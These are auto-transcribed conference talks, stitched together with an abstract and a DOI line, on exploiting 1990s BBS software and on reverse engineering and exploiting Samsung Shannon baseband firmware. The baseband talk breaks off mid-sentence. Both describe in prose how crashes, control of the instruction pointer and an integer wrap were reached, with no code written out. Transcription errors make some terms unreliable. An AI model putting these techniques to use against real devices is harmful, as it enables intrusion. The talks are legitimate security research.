DOSBox debugging interface. It's a bit of a pain. You can rebuild it with debugging support. Yeah, we just weren't able to bring very much good out of it. And looking at disassembly, I think you may have had to use debug back then. The premier reverse engineering tool of the 80s and 90s. Nowadays we have things like IDA and a slew of other tools at our disposal which makes it a lot easier from a reverse engineering point of view. Back then, today we have things like Procwan. Back in the day, security was war-dialing and guessing passwords. Today, it sees invisible million-dollar O-days. It's like the emperor's new clothing but in reverse. You can't see them if you're a good person. I'm just kidding. I still like y'all. So back then you got stoned apparently. And today it's a lot more annoying. I have to pay your ransom in Bitcoin. Dead drops. Gold bullion. And now looking at the post-modem era. Great leap forward, often requires two steps back. Not always though. These are what? This is not always a great leap forward or it's not always two steps back because we're about to take a couple of big steps back. Starting off talking about rip term. I mean, I'm just going to go through the basic tear down the same way we look at apps nowadays for like security assessment. What is the attack surface? It's a client but it's got all these protocols that it supports. There's the protocol that speaks with the modem which we don't expect to have too much influence over. So this is a command to dial a number and then the modem might say back no carrier or connected or whatever. There's a telnet protocol. ANSI codes, really great. Before there was a rip script which I'm about to get to, there was ANSI for all your color and cursor needs. There are various file transfer protocols. XYZ modem, I don't know. Didn't look into that because really once we looked at rip script there was no need to go anywhere else. This is super rich. So these got telegraphics. They were working on and if there's anybody from telegraphics here who worked there once upon a time, I love your software. Don't take any of this the wrong way. It's just a convenient old program for talk about modern day attacking. And it supported this really rich protocol called rip script for drawing vector graphics essentially. Whereas with ANSI you can make ASCII art and pretty colorful ASCII art but just ASCII art. With the rip script you could do all kinds of things. And accessing files on the client's computer is really crazy. So it's not script in the JavaScript sense where you can massage the heap or something too bad but you can do a lot. So we're going to look at that for vulnerabilities. Wonderful find anything. So we actually found something before we actually got to the reverse engineering part. But when you actually open up rip term in IDA, it doesn't really know what you're looking at and it's not something you can massage into something nice. You have to actually take one step further before you can be reversing it in IDA. And so we found two different ways to do this that I'm sure there's a whole bunch more but we thought that so Derek here actually took the LE and reconstituted into a PE. Almost. Okay. So for a little bit of background, the whole thing looks like a 16-bit DOS EXE but the 16-bit code sets up like this DOS protected mode environment. It's like the Wacom DOS extender if you've heard of that. And then inside of the EXE it's got embedded this linear executable which is actually I think the same format, almost the same format as Windows VXD's use. It'll load that into memory but there are just enough differences to make it annoying to where you can't just cut it out of the file and then load it straight in IDA. I got about as far as applying the relocations to it but then I just ran out of time because Paul came up with a better way. So it was kind of funny Derek was working on it and you spent a couple hours and I was like why don't you just do this? So I ran it in NTVDM and I was like give me a byte sequence Derek. So it was nice enough to spit one over and did a search, dumped the region of memory to disk, opened that up in IDA and there you go. It understands it and it's nice, it's easy, it's an oldie but I mean we still use it all the time. So that worked nicely. And this here is the process basically dumping it and going from a crash to an analysis and what we found was well you guessed it. It's a little hard to read but yeah, it's a straight copy. Now this is how Derek actually ended up with the crash. So what's your go-to technique nowadays? When in doubt you just fuzz it and see what happens. And so we did. I wrote this to a real dumb fuzzer. The annoying thing are those message boxes you see popping up. There are certain commands you can do that will cause a message box and then everything stops until it's dismissed. So I wrote a little program that would just emulate escape keystrokes to make it go away. I got a few seconds. Real cheesy but good enough. I don't think you could do that back in the day. So this is just a recording of what it looked like and it's drawing vector graphics here and you'll see lines and stuff like that which we thought this is the perfect place to look. And there's just like, I'm going to go with dozens. Dozens of commands. There's all that bang pipe and then command sequence and then parameters. And so the fuzzers really just doing a bunch of that, just generating a bunch of bang pipe garbage. And sometimes you get a circle. Sometimes you get a line. And then sometimes you get Rippy. No, the fuzzers name is Rippy. And sometimes you get a crash. This is the DOS extender itself intercepting the fault and then just doing a core dump thing to the console. What is that up in the corner? Do my eyes deceive me? So it didn't actually crash at 4 on 4 on the first time. Sorry, what was that, Steve? But this is after we massage the proof of concept a little bit, we got control over most registers, most notably EIP. I don't know if I quite have time to get into it, but this is a little weird. I was expecting RIP term to be like 16-bit, totally real mode. But no, not only is it protected mode, but it's actually 32-bit flat address space. I guess the DOS 4GW extender, presumably the 4G stands for 4 gigabytes. So that's why this crash dump looks like such a familiar format. Now when it comes to exploiting RIP term, this is like taking a step back in time and realizing, wow, okay, we have the keys to the kingdom here. There's no depth. Pretty much everything is RWX. It's like, okay, sweet. There is no ASLR. That's also nice. No safe SEH. No SEH. No stack cookies. Control flow guard. They didn't have control flow guard back then? I don't know what they were thinking. No CET or control flow enhancement technology. That's a new one. And it wasn't a problem. Can I do that? So we kind of went from, we took it to an extreme. We tried to do like Rop. And it totally worked. But then we were like, what's the point? Which kind of summed it up nicely. So we had our choice of tools. We had Windybug on NTVDM, which is pretty cool because you get to see it executing in protected mode with arbitrary selectors or in virtual 86 mode or whatever. Pretty convenient there is, of course, the DOSBox debugger. But that wasn't a pleasant experience. So it's not actually a debugger. So you can't set real break points and it's very frustrating to use. This brings us to the other application that we looked at, the server side. So pretty much Wildcat is, at least from our client perspective, it's all just text-based GUI. Like GUI. So yeah, UI, we'll say. So this is pretty much your attack surface. Whatever you can get it to do or whatever protocols it's going to speak, which is mostly just user keystrokes and input. But there's file transfer. We didn't really get into that because, oh, well, first we should talk about how to reverse Wildcat. This went a lot better than Rippederm. Let me tell you. Like IDA works like a charm. It knows, OK, so Wildcat was written in Pascal. It's all 16-bit. And IDA, bless its heart. It knows all those functions. Like it has flirt signatures. So it found their Alloc, found their copies. And it's like, oh, that's pretty handy. Yeah. The decompiler didn't quite work. Didn't expect it to so much. But nobody wants to go back to far pointers. OK. Now let's actually talk about tearing it down. So we walked through a bunch of the functionality. And this is just like a test drive version of Wildcat off of some public domain or some freeware CD. So I'll just cut to the chase. This is where we end up looking. Messages. Enter a message. You can enter a message. And now they have a 151 line limit, which, OK, you can only enter 151 lines. But you can insert wherever you like. Yeah. So they didn't bother to check which line you put there. And I'll tell you why that's cool. So Pascal has all of these string, like these counted strings. There's no, like, stir copy buffer overflow that I know of in Pascal. So like the lines in this message were truncated at 80 characters. But then you get to thinking, well, how about heap allocations? There are almost no heap allocations in Wildcat. Its use of the heap is paltry. But it uses it here. And here there's like a 16-bit arithmetic overflow. You put in a line number. It multiplies it by 81 to go find the place in the buffer to put it. So we were thinking it'd be funny if part of the exploit includes, OK, go here, enter a message at line 810 into these contents. 810 worked out to the size of a line times the number that you enter. And you only have to wrap a 16-bit variable. So you can end up overflowing the previous string. And you overflow the character that says how many characters are in the string. The good point of it was, yeah, like pretty much almost arbitrary control over where it writes to within that 64K segment. The bad part is, it's within the 64K segment. And there were basically, there's no heap header to overflow. There was a free list. But because it uses the heap so little, it didn't actually matter over providing the free list pointers. So we did not get code execution in Wildcat. This turns out to be a useful tool in crafting like a malicious message. But that's a story for another day. You know, demo? Yeah. OK. So we have a bit of a demo here. How do we get out of this? Sure. All right. So the demo's up here, Derek, for you. This is using that 16-bit wrap that we just talked about and entering some malicious payload. Now, this is DOSBox on both sides here, and they're talking to each other. Oh, very cool. Yeah, DOSBox is neat because it emulates modems. I think, oh, sorry. Yeah, do you want to drive? Sure. I think we just need to save it and open it. Yeah. So I think this was best done as a snapshot because you can enter this stuff by text, and nobody wants to wait around for that. And then entering your shell code with all number, number, number combinations by byte. That's for real. So we're just going to go there, and we're going to read that message that we just entered. Presumably you leave it for someone else, but... And what you end up with is a nice crash. And then it disconnects, and you can turn this crash into code execution fairly easily. So, it's like receiving a phishing email with an exploit attached to it, but old school. Just call this number with your modem. All right. Okay, so we just did that now. Now, we have one more demo to show you guys, and this is kind of where we left it. I think it shows off this perfectly. If you guys ever tried to get someone to play a game, and they're like, yeah, I'll do it in a minute. I'll just leave you alone. They never get around to it. Well, I think we may have solved that, Derek. Oh, man. Hold on. Okay. I tried to decrease the resolution just before so you guys can see it better, but we'll go back here. The wonders of DOSBox. Oh, sorry about that, guys. Thanks. Thank you for telling me. Okay. Here we go. So, this is just running RIP term, and it's talking to another application over a modem here. So, we're going to see an incoming call. Who's there? Why don't we answer it? And you launch DOOM on the system. Now you guys remember this? We were thinking about what to do with it, and it brings me back. The 90s live again, if only in our emulators. All right. So now that's the conclusion, and any questions? Y'all feel free to ask questions or watch us play DOOM. We're not going to make them watch us play DOOM. All right. Buddy, everybody ready to go to the bar? Yeah. It's not a question, but I just want to mention that for Recombi 2013, there was a Recombi VBS. Did you guys call it? No. So, the comment was that in 2013, there was a Recombi VBS. I had no idea. Yeah. So, I was wondering if you guys were going to be able to answer that question. I was wondering if you guys were going to be able to answer that question. I wish we'd known about that. We tried to stay away from hacking real computers. Opportunity missed. Give me the number. I'll hurt it here first. What else? I'm just going to guess if it's worth it. I'm just going to guess if it's worth it. Sure. Why not? Sounds reasonable. I wonder if those would be expensive or cheap. Yeah. What is the demand for those? We'll set the price at $1 million. Sounds reasonable. $9.99.95. Or they could just go and fuzz it themselves. Now, they know how because, you know. It's like software antiques. Anything else? Anything else? Y'all have been too kind. Okay. Thanks. All right. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
The bulletin board era was a golden age for those of us who were into computers (and in existence) at the time. Yet, think of how much better it could have been if we’d had today’s exploitation tradecraft to bring to bear back then. In this presentation, we’re taking modern technology back with us a couple decades and aiming it at BBS-era software, possibly to see what we can learn from attacking these scrutable-yet-unusual systems but mostly just because we can. We’ll use tools and techniques that didn’t publicly exist at the time to run, reverse engineer, attack, debug, and exploit old code. Finally, we’ll demonstrate some of the fun we could’ve had, if only we knew then what we know now… Source code and proofs-of-concept will be released.
|
10.5446/32742 (DOI)
|
Are you ready? Okay, cool. We're going to continue with the next talk now on some adventures in the cellular base pad. All right, thanks. Hi, everyone. Welcome to Breaking Band. I'm Daniel Komarumi, and together with my research partner, Nico Galday, we're going to talk about rivers engineering and exploiting baseman software. So, baseman security has been a pretty hot topic in the last couple of years. Going back to 2009 and 2010, started most of the couple talks on SMS fuzzing and then exploitation of memory corruption issues in baseband OSS. But in the time since, even though there's been a lot of good research on protocol security, there's not been a lot of new information published explicitly on vulnerabilities and real exploits. And that's been the case, even though the basemans have been targets upon zone with some of the highest payouts, but without any attempts until last year, of course. And in place of that, there's been, I guess, what I would characterize as far, a lot of repeated information that might have actually been accurate five or six years ago, but rehashed doesn't necessarily remain factual these days. So, that was basically our original motivation to get into this research. And talking about targets, obviously, Qualcomm basements have been the biggest recipient of attention in the recent years. And that kind of makes sense because they have maintained a very large market lead in this area. But of course, we used to work for Qualcomm, so we didn't have the opportunity to contribute to public research in this domain. However, last year was kind of a sea change because Samsung decided to ditch Qualcomm basements in their flagships and instead introduced their own implementation that they call Shannon. And this gave us an opportunity to go after a target at point to zone, as well as to essentially try to answer the question, okay, so this concept that the baseband OS is already massive black boxes and create this oblique security nightmare scenario where only some initiated few might understand how they work, but it's not possible to keep up with them from the outside. So, we felt like we wanted to take that challenge to see really how far can just a couple guys in a free time go in the period of a few months. So getting to the meat of the talk, we're going to start by describing our steps to understand and reverse engineer the real time operating system and then finding vulnerabilities and finally what it took to put together a full remote code execution exploit. And what we tried to do is not just go through the results and be like this is what the OS is like, but explain how we went through the process of understanding things and not just talk about the successes but also the failures. And then at the end, we ended up building quite a few custom tools and scripts that aided us and we were going to be releasing all of those. So, to get started on Shannon, this is essentially Samsung's own baseband implementation. It's an entire stack including full support for LTE and it's really not new. It goes back to really old devices, not just phones but USB sticks, but it was with the S6 that it was first introduced into their entire flagship line. But it's also used on non-Samsung devices. There are some MyZoo phones that use Shannon basebands and Samsung continues to use this design. So, essentially the S7 line has come out now and essentially all the models that are installed in the US use Shannon still. And so, when you get started, the first thing you want to do is acquire the firmware. This in the case of these phones is pretty straightforward. The Modem image is just one of the partitions accessible on Android, on the radio partition precisely. But once you have that blob, the naive approach doesn't get you anything. BinWalk doesn't recognize any meaningful signature here so clearly you're dealing with some kind of proprietary format for the firmware. So, the next thing you do is just to file up your favorite hex editor and try to make some sense of the header format, which in this case, luckily, wasn't that complicated because this file format that we call TOC for the first marker, which presumably just stands for table of contents, nicely includes as you can see on the slide, ASCII strings for the different parts. So, you quickly get an idea for what this is. And it's essentially just an enumeration of the various firmware parts that are stitched together. That includes a boot section, which is some type of bootstrap code. We talk about that later. And then the main, which is essentially the entire real-time operating system. And then there's two data partitions. One is NV that stores essentially radio configuration data that goes into nonvolatile memory. And the last one is called offset. That's also some data. We're actually not really sure what the purpose of that is, but we really didn't need to figure that out for our purposes. And then the last thing that's sort of obvious at the first look is that there's some kind of signature or hash attached to the firmware as well, presumably, of course, to use implement secure boot. So then you start looking at these different pieces. And first with the boot, we basically get lucky. Just looking at it in the hex editor, it's really apparent that you're looking at plain text code. That's an easy trick with ARM that you can often do. Because of the conditional codes in the first nibble, essentially, if something is code, then you will see these columns of E everywhere. And sure enough, if you fire this up in IDA, you get a very decent result from the auto analysis. And you could just get started from the beginning, from the reset handler and try to figure out what this exactly does. So we'll get back to that in a second. But more interestingly, then you want to look at the main part. And here we are not so lucky. It's a pretty massive binary. It's like 40 megabytes. But as you can see, no such luck before. These images are clearly somehow encoded, compressed or encrypted or what have you. And there's not a whole lot to fall back on because we also did that, of course, look at previous firmware variants for older devices. And in those cases, the main code was always plain text as well. So then you want to get an idea for, okay, what are we dealing with? Is this some known compression or known packing or some kind of maybe naive crypto and you get lucky. And a good thing that you can do is just look at the entropy of the image. Craig has an awesome blog post to explain this in detail. So we're not going to go into that. But the bottom line is just by the results, it's clear that this is some kind of a proper crypto. So then you have to think about, okay, well, how am I going to get back the plain text code? And we looked at a couple options and hit a bunch of dead ends and then eventually figured something out. So first we going back to the boot code, we looked at that. But the bottom line is that if you start reverse engineering in the code, it gets apparent very quickly that essentially all that's interesting to you. So the decryption and the signature checking is just done by tight copy loops that are essentially leveraging memory map dial. What that means is there are dedicated hardware pieces in the sock that will do the decryption, will do the signature checking and so on. So without some hardware based debugging support, that's going to be pretty hard to figure out. So then the next thing we looked at is the trust zone on the device. We just had the hunch that we might find the function that we used for loading or assisting loading in trustlets just because Samsung has the habit of putting a lot of value added features into their trustlets, NOx and what have you. However, in this case, this turned out to be a dead end as well. And then so then we looked at, okay, what's happening on the Android side since presumably somehow the Android would play a role in loading up this image. And so then you just look around a little bit in the boot logs and the radio log cap and the file system and running processes. And long story short, we found this one process which is called a CBD, which apparently stands for the cellular processor boot daemon. And even though this is involved in the loading of the image, as you will see in a second, for the purposes of figuring out how to decode that or decrypt the image, this also turns up to be a dead end. And the reason for that is because as it turns out, and again, this was basically just doing some old fashioned reversing of the image. Of course, this was the first Samsung phone using 64 bit for Android as well. So I guess that hex rays, the compiler plugin would have been super awesome six months earlier. But you know, what are you going to do? In any case, we were able to figure out relatively quickly that really all that this does is it processes this DOC format to get the chunks and then use this the spy connection to send it over to the modem side. And that of course, set it up with what we see in the so on the boot code that that just takes these chunks and then does the crypto magic to to to actually decrypt it and then then load it. And then so at first sight, that's basically not helpful for us. But in the end, it turns out that the CBD still gives us what we were looking for. And the reason for that is that even though it's pretty limited, it just does a few things. So it can basically start and restart the baseband. There's a couple more comments that he can do. And it nicely has a help menu that will list all the comments. In the case of the s six, the function that's interesting has actually been renamed to test. So that doesn't tell you all that much. But we also looked at all their phones and some other variants for the same comment just specifically say this is a RAM dump, you can dump the basement memory with it. So that's pretty apparent what that's going to do. And sure enough, this of course requires root. But if you're a root on the phone, you can just instruct the CBD to give you a memory dump of the baseband. And at first look, it's obvious that okay, well, nice, the code, nice, the string. So we got some kind of representation of the live memory of the of the baseband. But it's not perfect yet, especially because I guess in this context, it's annoying. But in in in the larger picture, it's a pretty great thing from Samsung that they actually continue to regularly update their devices. But from the perspective of the reverse engineer trying to maintain root, and also trying to keep up with the firmware variants. That's, that's a problem. But as we found out later, it's really not in your way because it turns out that you don't need the root to control the CBD, because there's just a few hidden dialer codes that you can hit up to reenable debugging functionality and then just use the menu to get the same exact RAM dump. And just as a sidebar, that's actually if you if you wanted to do some kind of reverse engineering on on Android phones, this is actually very typical of OEMs to add debug enablement into into these dialer code evoked menus. And in particular, XTA developers tends to be a very good forum with rich information on that. So really, if you're trying to debug anything, or that's an Android phone, you know, go through the forums first, then you probably will find some nice shortcuts like this. In any case, okay, so we got a RAM dump, but it's obviously not exactly the same as an understood file format. So we would still have to figure out, okay, well, how you would create like an idle order for this. And for that, we had to go back a little bit to the to the boot section and the CBD as well. And on this, we were lucky. Again, since it wasn't really that difficult to identify a piece of code that's static in the boot image, that basically lists out which memory areas are then stitched together into the RAM dump that's that that ends up being this 130 megabyte dump that's sent over to Android. So now actually reverse engineering can start because you have the segments. Of course, you don't know everything about them like the permissions and what's code and what what's data, but you have just about enough to put together a basic idle order. So I think I will take it from here. All right. Yeah, so what are we looking at this point? So we have like this 130 megabytes random, which is obviously quite large and large and about 40 megabytes of that is actually is also code. We have 70,000 functions. So manual reverse engineering. And this is definitely tricky. It's a lot of code. And obviously, this is a strip binary. Even though, as you can see on the right side, there's like tons of strings that are very meaningful. And one of the ones that was very useful early on was the one that you see here, which is actually telling you, okay, this is running on an ARM Cortex R7. Of course, this may not be true. But in our case, it was actually true. Yeah, so following that, our steps was where I didn't essentially we want to identify the real time operating system primitives from there, find our way to like the real meat, which is the radio layers, find a way to debug this and ultimately find the exploitable bugs in that. And so we go through these steps now. So now that we have the code, we could get our hands dirty directly, but there's still a couple of problems. The first one is that there is still a meaningful amount of code that's actually not identified as code. We have all these strings. And usually as a reverse engineer, you make use of these somehow, but doing this manually for such a large binary, binary doesn't scale. And identifying real time operating system primitives in IDA is often tricky because it lacks a deep understanding of like low level instructions. And ultimately anything that we're going to find out, we have to verify. So we need a kind of debug functionality as well. So the first thing we did was assist IDA a little bit with the detection of functions. So this is probably something that a lot of you guys have done before. So this is not meant to pick on IDA at all. Like function detection is a fairly complex problem, especially if you don't detect functions only via control flow. But essentially to make sure that we actually have all the code that we want to find bugs in, we first wrote an IDA plugin that is simply scanning for certain ARM prologues and then creates a function at that point. And even though that also includes false positives, these actually hurt very little throughout the process. Then getting to strings. So people usually look at strings, try to find like meaningful strings and then go back at the cross references, start labeling functions. But this doesn't scale. So for such a binary, we have like roughly 100,000 functions, 100,000 strings, which is also something that's quite common in basements, mostly for like debugging. So you have like various tools running on a PC that are used by modem engineers to do debugging in the field. And you have all kinds of strings like state strings. You have file path information, which is very valuable because this gives you kind of hierarchical information about the code. So every function that is including, let's say GRR is probably part of that particular layer or even that task. But our message or our thought at this point was really that any kind of automatic labeling is going to be more useful than the default subnames. So what we did at the first step here was we essentially categorized all strings into two buckets. The first one is what we call exec strings. And those are strings that keep appearing with certain types of functions. So assert functions like fatal error, things that give you some kind of debug information, tell you in what kind of file a crash was. And this is essentially strings that give you something meaningful about what the underlying functionality may be, where that code actually lives. The second category then is essentially everything else. So you don't just want to take everything that is a string because that contains a lot of crap as well. So we did some filtering and normalization and essentially limit this to everything that has a certain length, contains certain characters. And then we use this information to, yeah, apply labels to all the functions that make use of these. Now I don't want to go too much into the actual heuristics that we used here. It's also because we will release that code anyway so you can have a look. But essentially we use the mix between deciding, okay, is this function using an exec string? Is this also using a fuzzy string? And then either use a combination of these or prefer the exec string. And once you are at that point where you label these functions, you can also go one step back and start labeling the functions that call these. So we simply, like what you see here is we labeled this calls SMS something. And this gives you a lot more meaning to the actual binary when you have such a big mass of functions. And in our case, this gave us roughly 20,000 labeled functions, which is actually a lot if you think about that the original binary was 70,000 functions. The next step then is, okay, we want to identify how the real-time operating system works. And the way this is usually implemented is by using low-level instructions of that particular architecture. And on the Cortex R7, what you are looking for is essentially MCR instructions that are used for things like flushing caches, doing tasks and things like that. And unfortunately, either by default doesn't know these. So we wrote another plugin which currently supports the R7, R9 and R11 and essentially annotates all of these with the comment. And once you are there, just by looking at what the comment is actually, it's pretty easy to tell what the actual functionality is. So if you see like, okay, this is cleaning the data cache and invalidates the instruction cache and afterwards writes to a system control register, then this is very likely actually enabling these caches. So that was the first thing that we did and that helped us to kind of find the primitives that we also use later on for exploitation. But we certainly want to know a little bit more. So we want to know, okay, what kind of privilege level is this running at? How do we find tasks which are usually used in the cellular basepins to like implement various parts of the radio stack? How do these like talk to each other? How is the stack and the heap managed, which is going to be important for exploitation and going from there? How do we actually find the radio code, which is going to be the meat of this? So first getting to the execution mode, this is usually fairly straightforward. So on an architecture like ARM, you would expect some kind of kernel user space split and then have essentially supervisor call instructions that would trap into the kernel, implement a Cisco functionality and then eventually return. And while this exists on Shannon as well, it's not really used that much. So there's a couple of SVC handlers, but mostly they are used for RAM dumping and resets, which is obviously not enough to like implement the proper API similar to like other real-time operating system APIs. So at that point, and also having seen some register contents at that point already, we concluded, okay, this is going to be very likely all supervisor mode all the time. Ultimately, we had to verify this of course when writing an exploit, but I can tell you already that Shannon, this is running for the most part in supervisor mode, which means also that there is absolutely no separation between tasks that are running there. So yeah, any compromise there will have quite severe consequences. So the next thing you want to do then is, okay, you want to identify where is your actual radio layer implemented. And as I mentioned, this is usually done using tasks. And there's essentially two approaches here. One is harder. So what you can do in almost every case is you find your way through the interrupt vector table, you look at the reset handling and walk your way all the way through the initialization of tasks. But this can be very long. And for a big binary, this is definitely challenging. So we actually took a different route here. And we essentially made use of the fact that, okay, we have a RAM dump and every task that is running at that time is going to make use of data in that RAM dump. So that also means it's going to make use of stacks essentially. So what we did was we essentially scanned for a typical call frame patterns in that RAM dump and essentially backtrace that similar to a debugger. And eventually you reach a point where your backtrace hits the wall and then this is going to be very likely the place where your stack is initialized. And that is also the place usually where your task is initialized. So at that point you find like a link list which is like setting up these tasks and that you can walk. And we also wrote a script for that. And that brings us to what you see here essentially on the right. So this is listing of all the, not all the tasks, but some you see there's one for mobility management, which is one for the radius deck. There's call control. And it's actually also quite a lot of tasks. So you see like it's roughly 100 tasks. But going from there you can look at the actual radio parts. Now the next thing you want to know and is, okay, how do these tasks get messages? Like when is an OTA, like an over the air message processed by this task? And this is definitely not trivial, but all the tasks in real time operating system usually follow like one prominent pattern. And that is you essentially have a loop that is de-curing a message somehow then does processing on the message. And yeah, this is also the case here. So this is an example from, I'm not sure if you can read this hopefully. This is an example from the call control task. So you have one function at the top, which is essentially de-curing a message. And reversing that, there's unfortunately no silver bullet for that. Obviously it helps if you work at a vendor that is implementing basements. Even though there's like various projects like OpenBSC or Osmo-com where you can essentially get a feeling for how this implementation may look like. But anyway, all this is doing is it's de-curing a message stuff that into like a global data structure. Then you have another function which is processing this message and eventually the same repeats. And as you can also see here, and this gives you an idea of how much we actually understand about Shannon, like there's a bunch of stuff here we have no idea about, which is very likely related to like signals or state handling. But it doesn't really matter. But just like identifying these prominent patterns is actually fairly straightforward. Now the memory management is also going to be interesting for writing exploits. So I've mentioned how we are able to like find some stack area and walk our way back to understanding tasks. Looking at this also gives you information how the actual stacks are managed though. So just by looking at the task initialization, you see that okay, the structure also contains like the top and the bottom of your stack. So there's nothing special about these on Shannon. So these are all continuous in memory. They all start at a static location in between. You have that beef markers which are used for checking stack overflows. And then you look at the heaps which are a little bit more tricky but also fairly straightforward to identify. Once you realize okay, you have a fairly prominent call pattern is you have something is allocated. You have some data copied into a heap chunk. So it's fairly easy to spot these. And even though we reverse engineered pretty much the entire heap implementation, it's not too interesting. So this is a classic slot based allocator that organizes memory chunks and buckets of different sizes and you have like a W-linked free list. So this is mostly a reference for you guys. How about memory configuration? So the ARM Cortex R7 is nicely enough not using an MMU. So that makes figuring out the configuration a little bit more easy because you don't have to walk page tables or come up with any sophisticated tracing of the code here. But really all of this is controlled again with MCR instructions so that we could essentially reuse some of the scripting that we already had at this point. And just by looking again at the comments, it's fairly easy to spot a function which is used to configure the MPU which is going to be some kind of wrapper that is then called. And tracing this, you get a pretty good understanding of how the memory looks like. So at that point, we knew precisely what kind of memory regions are there, what kind of permissions they have, what bits are set, which on the one hand allowed us to improve our loader, but on the other hand was also useful for exploitation. So one thing you see here already is that there's one region exist, for example, that has Xn and another one doesn't. I just realized you don't see my mouse pointer. Sorry about that. So yeah, at this point, you have all the information to go further with exploitation. Now there's one thing missing that I mentioned in the beginning which is we need some kind of debug capability. One thing that's nice on these devices is once the device crashes, it actually gives you some kind of crash information already. So in this case, you see like this is showing you it's a data abort. So that already gives you kind of a clue about, okay, what you may have hit with your payload there. But looking around for more information, we eventually found this nice function on the right here which is called dump reg values. And this essentially gives you a complete map of all the registers in memory. And for a while we were wondering, okay, how is this actually ending up? There is some memory map magic that does this, but turns out it's much simpler. So by simply following the interrupt vector and the exception handling here again, the exception handling is filling that information out once you hit a crash. And this essentially gives you a proper crash debugging. So you see you even have the bank registers. That was very useful to also tell whether we are running in supervisor mode or not at that point. But and what you're looking at next at this point is, okay, you want to do some more debugging, especially when the modem is running because this just is just useful once it already crashed. So we also looked into live debugging. One thing that's interesting in this context, there was a publication earlier this year about the fact that on Samsung modems, the UART is exposed over USB and you have an AT interface on that. And there are some privacy implications because you can essentially do calls and other things, even though the phone is locked, which you shouldn't be able to do. But turns out it's actually far worse because if you look at what Samsung really added there, one of the things they added is full memory read write for the modem, which at that point you can definitely use to build your own debugger, which we unfortunately didn't do mostly because once we were at that point, we were already so far into exploit development that we mostly use this for like poking a little bit at memory and looking at values. But yeah, it would be enough to build a debugger. So if anyone wants to do that, you're welcome. And as a general hint, so this is actually fairly common as well. So don't ever just assume that a baseband vendor would just have like the normal set of AT commands. It's definitely useful to look at this and there's usually a bunch of goodies hidden there. Okay, so going from there, we looked into finding bugs and then you're going to talk about that part. All right. I hope we still have the room we're kind of rushing along at light speed here. But now we're getting to the fun parts, I guess. And it also means that we're getting to the part where now we can no longer not show you 3GPP diagrams. Notice that up until now you didn't need to know anything about GSM or LTE or whatever. And you already have the understanding of you can debug the environment, you know what the tasks are for every task, you get an idea of what that is, where it starts, how you process these messages. So you're pretty far along. But at this point, you would need to make some kind of choice as well. Okay, well, what type of bug do I want to look for and in what? And at this point, it's useful to have the reference of, okay, what is the functionality here supposed to be? And based on that, we decided to look for memory corruption issues in the parsing of layer 3 messages or NAS messages. And the reason being is that that's based on the spec that's complicated enough to hopefully give you some opportunities and also the messages are long enough. That's an issue that sometimes with the lower layers of these stacks like RRC, for example, that the signaling messages are very short. So even if you find yourself maybe a buffer overflow or something like that, you might have a really hard time, you know, getting useful payloads. Not so much with NAS. So we have a target we would have to, based on that identify, okay, where's the task that I care about? And with some understanding of NAS, you will know that you will have tasks like mobility management and connection management. And particularly in connection management, a piece called call control, which as the name suggests, you know, you set up the calls, you manage your calls, you end the calls and messages like this. And all these messages, the way they are encoded is they use what they call information elements, which are basically just TLV or LV encoded chunks that comprise a message. And then in NAS message, we'll have some mandatory IEs and then usually quite a bunch of optional IEs. And so then what you will need to do is you will need to identify, okay, within the call control task, where is the parsing that happens that will take the wire format, split the dot into information elements, presumably put that into some kind of internal representation, and then start working on that to actually parse the message. And for that, I guess one approach you could take is take your understanding of what type of magic values and value ranges you're supposed to see when you look at a certain type of message and try to sort of identify that needle in the haystack. Or the more straightforward thing is to start from the top of the message processing within the call control and just go through that. And that's what we did. And no magic source here, it's just some manual reverse engineering. You would expect, and that's the case here, that what, so you don't have it that easy. So the, the, the, once you dequeue that message, you will have that pointer. It's not exactly the wire format just yet. It's going to be enveloped in some kind of Shannon proprietary internal structure representation. So you have to do some reversing to peel away the headers that they have. And then you finally find yourself at the point where, okay, well, now this is great. And I have a pointer. And I know that these bytes in their structure are going to correspond to what 3GPP says a message like this is supposed to look like. So basically you find yourself at a, at a central function that we just named par size is that is used all across these different tasks like M M and SMS and all that also in CC. And this goes ahead and uses a global array of definitions of what information elements have to be like, what their type is, what the minimum size is and things like that. And then it uses that in a big parsing loop to take out every IE from the message and, and fill out another global area, which is the, going to contain the representation of currently existing IE's and, and that again just means for each IE a pointer to where the actual values of the bytes are a length indicator and whether this IE is currently present in the, in the message or not and so on. And then this parsing happens and then a dispatcher handler is just picked from a, from a, from a table of handlers, which, which is picked based on, okay, which type of message do I have? And then that handles the message. And then so this is pretty good now, but for these tasks, the number of messages that they can have is actually pretty large for call control. This is quite a few dozens. And only some of those correspond to the actual over the error messages. So one of that is going to be the handling of the setup or the alert and so on. But then there's going to be a bunch which are internal messages with lower layered tasks and CC. And so if you have no hints, then something that you can do is you already have your understanding of which information element is put where in memory. So then you can take your knowledge of, let's say a setup message has to work on yet the other type of IE. So you can look at the parsing and see which of that, that array it uses and try and match it that way. That'll be more complicated. Luckily here, it was a lot easier because in this area representation of the handlers, as you can see on the snapshot here, you don't just get an ID and the pointer to the handler, but you guys get a nice log string, which basically tells you which message this is. It even contains the tag radio message for the ones that are over the handlers. So it becomes really easy to precisely label these. And so at this point, we basically know, okay, where we are at is for the task, we know the exact handler that handles the given message, and we understand how it gets its input. And more importantly, what part of it is tainted or what constraints even exist on the length or the value, pointer and so on. And so at this point, you notice that there was maybe like a five minute period here where you had to be like, okay, I have to know 3GPP. And once again, we find ourselves at a place where, hey, now, you know, it's just parsing. It might as well be Adobe Reader, whatever. There's an input. There's things like a length, you know, how much it's constrained and how much it isn't. And you're basically operating on straight up over the air messages. So that's at that point, you can pick your poison in terms of how you like to look for bugs. You can go for some manual analysis and some either scripting, I guess, to to help you with finding things like unbounded length values going to mem copies, or you could go for something more complicated, maybe use your own on the compiler output or Bjorn or whatever is your favorite study analysis tool. In our case, and this is sort of a point of a few is important to make. It was relatively quick for us to find a vulnerability that was a winner for us that we picked for phone so on. And so that didn't really force us to do a more in depth bug hunting endeavor. So we feel like we're not in a position to answer questions like, okay, how buggy is this code? More importantly, when you talk about how to find bugs, inevitably could have the question, okay, how about fuzzing? For the interest of time, I'll just skip over this. All I just want to say is, it's not necessarily what we would recommend. But if you want to know why, ask us later. And but now this takes us to the vulnerability that we actually used to get remote code execution. So Samsung relatively quickly in about a month's put out an advisory for the vulnerability. We don't really like this description all that much. So instead, here's what we actually submitted to them. Well, you can read it on the slide. The bottom line is that one of the messages in call control is a progress message, which contains one mandatory information element, which is called the progress indicator. And this can be sent anytime during the duration of an active call. Active call just means it actually has to be alert at least. So it doesn't have to be picked up 